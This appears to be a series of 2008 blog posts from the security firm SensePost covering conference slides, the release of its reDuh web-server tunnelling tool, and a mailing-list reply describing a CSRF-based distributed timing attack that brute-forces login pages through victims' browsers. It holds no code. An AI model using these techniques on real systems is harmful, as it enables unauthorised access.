Conferences
HITB08 Slides available..
Slides from the latest Hack in the Box conference [are available] [SensePost slides are listed as owing / not there yet]
SensePosters can grab a local copy [here]
OWASP NYC Talks Posted..
The full videos from the OWASP NYC Conf have been posted.
At least one BlackHat re-run, but some look well worth the watching.. Most people can grab the videos and slide decks [here], SensePost’ers (except for those actually currently living in NY) can grab selected talks locally [here]
BlackHat/DefCon 2008 – Tool Release(s)
Hey guys..
Our BlackHat/Defcon talk this year featured a few tools that we promised to release.. The first tool, or set of tools is reDuh which can be found [here]. reDuh is made up of 2 parts, a local proxy and a server component (which is jsp, php or asp). If you run the local proxy on your machine while pointing it to the server component, you are able to make TCP connections clean through the web-server. This comes in surprisingly helpful (and if nothing else is really cute!). You can read more about reDuh (with pretty pictures) by checking out the [reduh page] or by checking out our [Vegas slides].
BlackHat / DefCon 2008….
Hey guys..
Most of our BlackHat/Defcon team has arrived back home in one piece.. I landed with a fever and a lost voice (but to be honest i already caught something while in Vegas!)
We will post some post-Vegas thoughts as soon as the dust settles, but i also promised:
The slides from our talk The tools we released… A link to the slides is here: [Pushing a Camel through the eye of a Needle]
DefCon 16 – Hmm.. 2 of these talks seem familiar…
Some of the DC16 speaker summaries have been posted, and these 2 caught my eye:
Time-Based Blind SQL Injection using heavy queries and
New Tool for SQL Injection with DNS Exfiltration Both descriptions seem pretty much spot on with what we did in our DefCon talk last year..
hmm.. wonder if its new twists on it, or a little more of the same?
/mh
2 Winning quotes..
from the SourceBoston videos i blogged about:
Dr Geer never dissapoints, and kicked it off with the 4 rules on his office wall:
Work like hell, Share all you know, Abide by your handshake, Have fun. If he mentioned anything about foosball or pool.. i woulda sworn blind he was talking about SensePost!
The 2nd quote that was awesome, (during the interview with the l0pht members) was from Dildog.. ex-l0pht, ex-@stake, now Veracodes chief scientist.. The discussion turned to “security companies and snake oil”, and the fact that dildog was a “vendor” again.. With a dry smile that could have been at home in a john cleese movie, he replies:
2 reasons to visit sourceboston.com (and 2 reasons to rejoice!)
SourceBoston completed its first conference earlier this month, and some of the slide decks and videos are up..
While the image of the young hax0rs indeed brings back fond memories of surfing blackcrawlarch and trying in vain to get mosaic chat to work in the lounge, it isnt one of the 2 reasons to rejoice..
The chance to watch Dr. Dan Geers talk (Dr Geer is one of those people who remind you how un-smart you are everytime you hear him speak) And on a mildly unrelated note (for some definition of mild), the fact that all USENIX conference proceedings have been made available freely online.. Rock on!
RE: Sensepost at Cebit 2008
“SensePost have once again been invited to join the South African Department
of Trade and Industry at Cebit, as one of 10 SA companies, to exhibit on
their pavilion. Visitors to this show range in the region of 500,000 and
approximately 5700 exhibitors fill the 27 Halls. Cebit is the biggest
information and technology show in Europe and attracts exhibitors and
visitors from all over the world.”
HBN Bootcamp @ Black Hat
Black Hat DC this year is supposed to be “a different kind of Black Hat”. There are four tracks over the two days with a special emphasis on wireless and speakers include Chris Wysopal, FX from Phenoelit, Job de Haas, and Adam Laurie. The smaller shows are always good fun and good value for money and DC this year promises to have an excellent line-up of speakers.
As usual training courses are offered on the two days before the briefings begin. Its been a while since we trained at DC but this year we’re back with a Bootcamp course. The course is filing up nicely, so we’re totally stoked. Like the show, the courses tend to be smaller and more personal so if you’ve never attended a Hacking By Numbers
‘Bootcamp’ course before then this is a great opportunity. Bootcamp Edition teaches a method-based approach to hacking into networks and systems over the Internet. The method taught consists of seven distinct phases that each have their own objectives, techniques and tools. Students are provided with fully-configured laptop computers that are used stage-for-stage to complete fifteen different technical exercises. You can learn more or enroll here… otherwise contact us via training@sensepost.com if you’d like some more information.
Rob Auger from OWASP/WASC/CGiSecurity on Timing..
Rob had a rant on his site on the timing attack, with a CSRF twist.. We met him after our Vegas talk, but im not really sure how his attack differs from our published one..
my on-list response:
-snip- From: haroon meer To: bugtraq@cgisecurity.net Cc: websecurity@webappsec.org Subject: Re: [WEB SECURITY] Performing Distributed Brute Forcing of CSRF vulnerable login pages Hi Robert..
Thanks for the kind words on the talk.. If you check out the visio at: http://www.sensepost.com/blogstatic/2007/08/dxsrt.png you will see that its pretty much the same attack.. In a shameless display of self-pimpage, check out the paper http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf from page 12.. Figure 23 for example shows the results in a victim/zombies browser, after he has visited our page.. Effectively he tries the userlist we send him (in this case on a standard squirrelmail login page). Once he detects a timing diff (again using a trivial algorithm to avoid latency disparity) he simply makes another request to the attacker to report his success..